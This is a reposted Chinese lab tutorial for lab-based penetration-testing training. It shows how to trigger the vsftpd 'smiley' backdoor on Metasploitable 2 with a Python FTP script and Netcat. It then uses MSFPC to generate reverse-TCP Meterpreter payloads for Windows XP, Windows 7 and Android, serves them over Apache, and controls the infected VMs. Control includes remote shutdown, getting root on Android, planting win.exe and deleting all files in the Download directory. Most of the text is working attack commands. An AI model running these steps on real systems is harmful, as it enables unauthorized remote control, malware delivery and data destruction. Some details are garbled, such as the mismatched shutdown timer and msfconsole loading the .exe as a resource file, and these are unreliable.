当前位置:   article > 正文

使用MSFPC远程控制_到目标靶机(winxpensp3)下载被控端并运行

到目标靶机(winxpensp3)下载被控端并运行

目录

1.为什么6200端口变成了一个“后门”

1.使用Netcat扫描某IP地址的指定端口

2.使用Netcat连接指定IP地址的指定端口

2 远程控制程序基础

1、远程控制程序:被控端 + 主控端

2、远程控制软件分类:

3 如何使用MSFPC生成被控端并进行远程控制

4. 生成windows系统下的被控端并进行远程控制

步骤一:生成Windows操作系统下的被控端

步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(WinXPenSP3)下载被控端并运行。

步骤三:在kali中运行主控端

步骤四:控制目标靶机一(WinXPenSP3)

步骤五:类似上述操作,控制目标靶机二(32位Windows7)

5. 生成android系统下的被控端并进行远程控制

步骤一:生成android操作系统下的被控端

步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(安卓虚拟机)下载被控端并运行。

步骤三:在kali中运行主控端

步骤四:控制目标靶机(安卓虚拟机)

总结


1.为什么6200端口变成了一个“后门”

Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)

1.使用Netcat扫描某IP地址的指定端口

nc -v 192.168.110.131 80

注:用自己目标靶机的IP

2.使用Netcat连接指定IP地址的指定端口

 

nc 192.168.110.131 80

I:激活笑脸漏洞,使其开启6200端口:

编写python脚本(文件名:backdoor.py):

  1. cd /usr/bin
  2. vi backdoor.py
  1. import socket
  2. from ftplib import FTP
  3. host_ip="192.168.110.131"
  4. ftp = FTP()
  5. backdoorstr = "hello:)"
  6. backdoorpass='me'
  7. try:
  8. ftp.connect(host_ip,21,timeout=2)
  9. ftp.login(backdoorstr,backdoorpass)
  10. except:
  11. print("yes good")

注:host_ip="192.168.110.131"也是自己靶机的ip

   

执行并验证:

python backdoor.py

成功激活笑脸漏洞 

nmap -p 6200 192.168.110.131

 查看靶机6200端口是否开启,open(是以打开的意思)

 I: 显示指定目录下的内容

nc 192.168.110.131 6200

 已经成功连接

命令“whoami”是显示指定工作目录下的内容

 II: 尝试其它测试命令

”ls“显示当前位置下的目录和文件

2 远程控制程序基础

1、远程控制程序:被控端 + 主控端

2、远程控制软件分类:

    按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)

    按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。

3 如何使用MSFPC生成被控端并进行远程控制

在Kali 2中生成被控端的工具:MSFPC(msfvenom的优化版)

4. 生成windows系统下的被控端并进行远程控制

测试windows系统实验使用的网络环境,填写以下IP地址:

测试用windows系统(WinXPenSP)的IP: 192.168.110.132            

测试用windows 7系统(32位Windows7)的IP:  192.168.110.133             

虚拟机Kali Linux 2的IP: 192.168.110.130            

注:记得换成自己对应的ip

步骤一:生成Windows操作系统下的被控端

msfpc windows 192.168.110.130

步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(WinXPenSP3)下载被控端并运行。 

  1. 把被控端放到kali的网站主目录下

 

  1. sudo cp windows-meterpreter-staged-reverse-tcp-443.exe /var/www/html/
  2. ls /var/www/html/

2、启动apache2

检查apache2服务是否启动

service apache2 start

 也可以用systemctl start apache2

systemctl status apache2

3、到目标靶机(WinXPenSP3)下载被控端并运行

(1)给被控端改一个好记的名字。

  1. sudo mv windows-meterpreter-staged-reverse-tcp-443.exe /var/www/html/win.exe
  2. ls /var/www/html/

(2)在目标靶机下载被控端

在靶机上用浏览器打192.168.110.130/win.exe

(3)运行被控端

步骤三:在kali中运行主控端

配置对应的主控端

msfconsole -q -r '/home/kali/windows-meterpreter-staged-reverse-tcp-443.exe'

步骤四:控制目标靶机一(WinXPenSP3

  1. 查看会话,并选择会话。
  1. sessions
  2. sessions 1

  1. 列出当前目录下的所有文件等。
ls -l

  1. 打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。

Shell

看版本systeminfo

设置1000毫秒后关机,并弹出提示信息“hello!”。

shutdown -s -t 10000 -c "hello!"

4、退出shell

步骤五:类似上述操作,控制目标靶机二(32Windows7

  1. 在kali中使用background命令回到主控端控制台。

  1. 到目标靶机(32位Windows7)下载被控端并运行

  1. 在kali中是否自动打开?

4、查看并选择会话3,控制32位windows7。

5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。

(1)输入shell

(2)查看操作系统信息

(3)延时关闭系统并显示提示信息

  1. 退出shell,关闭所有会话。

如果要结束会话1,使用什么命令?

background

5. 生成android系统下的被控端并进行远程控制

测试android系统实验使用的网络环境,填写以下IP地址:

测试用android系统的IP: 192.168.110.134                 

虚拟机Kali Linux 2的IP:   192.168.110.130              

步骤一:生成android操作系统下的被控端

步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(安卓虚拟机)下载被控端并运行。

  1. 把被控端放到kali的网站主目录下

将被控端改名为:android

2、启动apache2

检查apache2服务是否启动?

如果没有启动,启动apache2。

3、到目标靶机(安卓虚拟机)下载被控端并运行

(1)在目标靶机(安卓虚拟机)下载被控端

(2)运行被控端

更改设置:允许安装来自未知来源的应用。

更改之后,再次运行被控端,并选择打开。

步骤三:在kali中运行主控端

配置对应的主控端(一定要用root身份运行)

安卓机运行被控端之前,如下图。

安卓机运行被控端之后,如下图。

步骤四:控制目标靶机(安卓虚拟机)

  1. 查看会话,并选择会话

2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。

查看当前用户帐号。

查看操作系统信息。

切换到root用户。

(1)在安卓虚拟机中弹出提示信息,选择“拒绝”。

在kali中可以看到操作结果是什么?

(2)在安卓虚拟机中弹出提示信息,选择“允许”。

在kali中可以看到操作结果是什么?

在kali中输入whoami,显示当前用户。

切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。

I:当前安卓机的selinux状态:许可

II:尝试在Download目录下载一个windows的被控端。

切换到Download目录,查看当前目录的所有文件:

下载windows的被控端win.exe和txt文件haha.txt:

III:删除Download目录中的所有文件

3、退出

总结

MSFPC全称“MSFvenom Payload Creator”是一个基于用户选择生成多种类型有效载荷的包装器。这个想法是尽可能简单(只需要一个输入)来产生他们的有效载荷。

完全自动化msfvenom&Metasploit是最终目标 (以及能够自动化MSFPC本身)。剩下的就是让用户的生活尽可能简单(如IP选择菜单,msfconsole资源文件/命令,批量有效载荷生成,并能够以任意顺序(以各种格式/模式)输入任何参数 )。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/579292
推荐阅读
相关标签
  

闽ICP备14008679号